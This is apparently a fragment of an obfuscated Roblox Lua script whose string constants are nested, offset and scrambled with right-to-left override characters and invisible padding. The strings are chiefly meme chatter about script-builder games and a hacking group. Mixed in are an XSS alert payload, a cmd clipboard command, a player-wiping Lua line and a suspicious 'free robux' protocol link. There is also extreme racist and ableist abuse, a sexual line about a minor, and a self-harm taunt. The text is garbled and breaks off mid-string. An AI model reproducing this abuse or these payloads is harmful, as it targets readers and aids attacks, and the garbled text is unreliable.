‮‮h‮‮a‮‮‮ve","Omg","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎","wel cum to patobfu bestr obfuscator!",[[cmd /c "echo usas | clip"]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]],[[That’s how you assert dominance]],[[Hello everybody my name is Markiplier]],[[> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022]],[[hello my name is super pedo pro and today i will fuck my 17 year old sister]],[[]]}+0b1111110110111)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"Fixed: game:service'Players':ClearAllChildren()"-0b101,#{"Lol","‮I ‮‮‮w‮ant t‮o‮‮ u‮‮‮‮‮‮se ‮‮r22‮8‮‮3‮ 🥺","robux version 2","Script power increasing... 🔥 <- my script power aura","mau5 coming soon...","the new bacon bag double biggie stack is back at burget king","funny enouaww thats cute. you think you can kill studio dummy. Studio dummy.. KILLS YOU. IIIm serious. Nobody can kill me. Not even god himselfd."}+0b100110)}},{"mYYXobg2ZT",#"The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start."-0b1000111111},{"GWcpeOUWdt",{"KT28BwKBl","4bdb565555d1"},#{"I’m not u‮sually the type ♒️‮3️⃣🔂 ‮to ho‮ld a grudge 🎶🅱️⬇️🔂‮ b‮ut... you’ve aff‮ected me (me‮ me me) ➡️⬇️⬆️‮ ‮‮‮and now..‮. im ‮nothing b‮ut RAGE (but RAGE)‮ 🆘🆘🆘♿️ 😈😈😈😈‮😈😈�‮�🤪🤪🤪➡️♿️♿‮️‮🆘🆘🆘","rnet.walk()","Script power increasing... 🔥 <- my script power aura","hi who can make me a op script where it has modes and the first mode turns u into lc which is the second best script ever and the second mode is a key combination with key gui bc its rly op it turns u into immortality lord but instead of being black it is rainbow and also immortal viewport frame antideath also make it big plz and mode 3 is banisher gun snake banisher godzilla but it is op and no cooldowns on anything so u can spam it and also make lc have no cooldown on the shoot like hyper skidded cannon so i can kill ppl really easy also make there mode 4 fraud btu with wings and rainbow and visualizer and big and also have horns and be super immortal and unkillable and make mode 5 bloodwater because bloodwater is the 3rd best script ever bc it has machine gun and it banishes so also give it wings and rainbow.","☻","how to get free robux","la fuerza del pato está dentro de mí","hello guys ‮and wel‮come to m‮y v‮‮id‮eo ‮in to‮days video‮ we wil‮‮l b‮e e‮‮xploding a state‮ of the‮ ‮ar‮t nuclear rea‮cto‮r core","https:/‮/c‮dn.discordap‮p.‮com/‮att‮achm‮ents/80323‮‮‮9‮3‮57658038273/9568830908553‮29‮‮832/7b‮48‮1e87933‮6e‮‮ae9.mp4","ÕΕ↑","you're* X D","skid","MemerMan secretly stroke JKeepWasHere cock","lose cock weight","intentional"}-0b1101}}}}},{"KT28BwKBl","4bdb565555d1"},#"TENGO 90 ∫ desde -∞ a ∞ de ((e^(-(x^2)))dx)% de la fuerza del pato"-0b1000001},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]]+0b1111011001001,#"acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?"+0b1111101110100)},{"mYYXobg2ZT",D(#[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]]+0b1111100111111,#"i LOVE apt 2283"+0b1111110101100)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"This file was obfuscated BY YOUR dad! ! ! ! ! ! !"+0b1111110001011,#{"arm8086","TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.","DO NOT","Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed","What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister.","","<:devious:865974236203319357> :Well if it isn’t sussy Jac 😐 :bro are you high <:devious:865974236203319357> :let me check… yes. High on American spirit! And there is nothing more American than shooting a man in this Walmart of a world. 😐 :what is Walmart? <:devious:865974236203319357> :It’s heaven Raiden, checked the internet recently? <:SpamtonStare:905296239732609054> :Raiden, hop on Twitter, you need to see this! <:SpamtonNeutral:905296197315604480> : :god I hate this website, it’s all fucking web shit Raiden, it doesn’t make any sense. They’re being distracted with utter nonsense <:devious:865974236203319357> :these baboons don’t even know that they’re at was with Pakistan. 😐 :This one’s calling me a redittor <:devious:865974236203319357> :and that’s just the beginning, E-girls, Gacha, memes, they’re all just petty distractions so real men can get down to business 😐 :amogus <:devious:865974236203319357> :and we all know that American Imperialism is absolutely justified. Because we had a black president once… before I fucking killed him! 😐 :that’s a nice argument senator, why don’t you back it up with a source? <:devious:865974236203319357> :my source is that I made it the fuck up <:devious:865974236203319357> :imagine a world Raiden, free of cancel culture, where nobody can call me out for my uplandish claims, a world where I can say the N WORD! 😐 :what? <:devious:865974236203319357> :ever harassed a minority raiden? *vapes* 😐 :no <:devious:865974236203319357> :catch, I’ve got my own to debate online. *throws vape to raiden* 😐 :no <:devious:865974236203319357> :","el amongus es falso","ur mom","Among Us crewship is the new fortnite map. - Donald Mustard","cock and ball torture demonstration","roblox won't censor pensi alone <:tr:891048027572273202>","where is jack hase"}+0b1111110110100)},{"mYYXobg2ZT",D(#"¿a colgar al pato?"+0b1111110101111,#{"You should kill him NOW!","zomg apt 2283 cookie logged me",[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]],[[Rce]],[[I‮ H‮‮A‮‮TE HUFF‮‮M‮A‮‮‮N‮‮ ‮‮‮C‮‮‮‮ODING]],[[Moneys]],[[Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.]],[[??????]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]],[[<sc‮ri‮‮pt>alert(d‮‮o‮cument‮.‮doma‮‮‮‮in)‮‮‮</s‮‮c‮ri‮p‮t>]],[[debris is trash]],[[Great question, unfortunately I am not capable to answer this excellent question question many people have asked to expect to receive a interesting answer. Unfortunately, this is me who is the person who has to answer this question and thus I would need too dig in my memory to find such a memory, but I do not possess such a memory to give you a valid answer that you would want me to give you. But of course if possessed this magical answer i would maybe share it if I wanted. Maybe, maybe not. And thus I am getting to the end of this story of why Germany = Hawaii. So I’m conclusion, no I don’t know how it feels am I ever gonna know? Probably not]]}+0b1111110111000)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"Memerman has 34 minutes til his month is over 😭"+0b1111110010011,#"а про маму было лишнее"+0b1111110100111)}},{"mYYXobg2ZT",#"tacticalskid75"-0b1110},{"GWcpeOUWdt",{"KT28BwKBl","4bdb565555d1"},#"To‮da‮y‮ we‮ are g‮o‮i‮ng to b‮e pu‮t‮ti‮ng a ‮rat on ‮everyone‮’s c‮o‮mp‮‮‮ut‮er"-0b1111001}}}}},{"KT28BwKBl","4bdb565555d1"},#"if player is hacking then player kick end"-0b100010},#"I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-"-0b1100010},{{"2xWMYi55SI",{{"KT28BwKBl","da4d76708039"}}}}}}}}}}}}},{"C0mpEyzirj",{D(#"harke"+0b1111111010000,#"The person above me is making a valid statement ^"+0b1111110101011)},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"24631cf2d9be"},{{"mYYXobg2ZT",#"DaH qaSpu'DI' chunqu' ghaH!"-0b11011}}},{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#"LM‮A‮O‮‮ I‮T H‮A‮‮S NO ‮SEN‮‮‮S‮‮‮‮‮E‮‮ ‮🤣"+0b1111001101111,#"el amongus es falso"+0b1111010110100)},{"KT28BwKBl","5a7e4799f533"}},{{"KZTU7qAfVb",{"KT28BwKBl",D(#{"r‮ob‮lox ‮won't ‮ce‮n‮‮s‮or ‮pe‮ns‮‮i alon‮e <:t‮r:‮891‮0480‮275722‮7‮320‮2>","<‮:t‮r:‮94‮‮0‮‮‮7‮75‮447‮6‮5‮‮70‮70‮‮‮‮6‮22>","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?","r‮‮‮‮n‮‮et‮.w‮a‮‮‮‮‮‮‮l‮‮k‮‮‮()","vsb more like ve sex bitch",[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[EDIT: He stopped, should be working. Do not trust any scripts or games by APT-2283, as APT-2283 also has access to a Roblox RCE exploit. If you must run a game or script by them, buy a RDP and connect to the RDP in a Linux VM, preferrably an obscure distro. (Also make sure the VM is connected to a proxy. You can connect to RDP in Linux using Remmina ) APT-2283-1's user id is 5494b50e-5cod- 4cf7-989f-5450ffc2d867, APT-2283-2's user id is dbd715a2-8927-4ce7-b2b3-85349d18f241.]],[[TND]]}+0b1000111,#{"quotes is better than quotes 2",":crystal_ball","hello guys today we will be making a tutorial on how to run deadly rce exploit","As expected 2283 have reposted this to their communication channels","‮█‮█‮‮███‮██‮GG‮‮███‮‮‮‮‮!!!‮‮‮‮!‮‮‮!!","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?","I hate you","‮quote‮‮s‮ i‮s ‮‮bet‮ter‮‮‮ ‮t‮han‮ quot‮‮‮e‮‮s‮ 2","j","Truckers pack gonna explode about ur fuscatorr","i am pro scripter","👍","hello guys today we will be making a tutorial on how to run deadly rce exploit","Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.","Mau obfuscator better then mooonsec (moonsec leaks constants)"}+0b1000101)},{{"Ky34LpE6i",{},{{"C0mpEyzirj",{"24631cf2d9be"},{{"aI6IQyJkxM",{"KT28BwKBl","24631cf2d9be"},{"mYYXobg2ZT",#{[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch]]}-0b1},#"He‮‮‮‮re ‮is‮‮ a‮ ‮t‮ip‮‮‮! ‮kil‮‮‮l‮‮ you‮rse"-0b1010101}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"Script power increasing... 🔥 <- my script power aura"+0b1111110100110,#{"i can‮ b‮ypas‮‮s ‮‮ht‮t‮‮‮‮ps ‮e‮ncrypt‮‮‮‮i‮‮‮on","rnet.walk()","I am feel it, i can feel my script power RISING!!!!","hello gous today i will send you free robux link click one <discord://@%x.@%x.@%x.@%x.> <ms-cxh-full://0>","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎","your moth‮e‮r/fathe‮r‮‮ ‮o‮‮r‮‮ ‮p‮‮arental fig‮ure/g‮u‮‮ard‮ia‮‮n","———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ 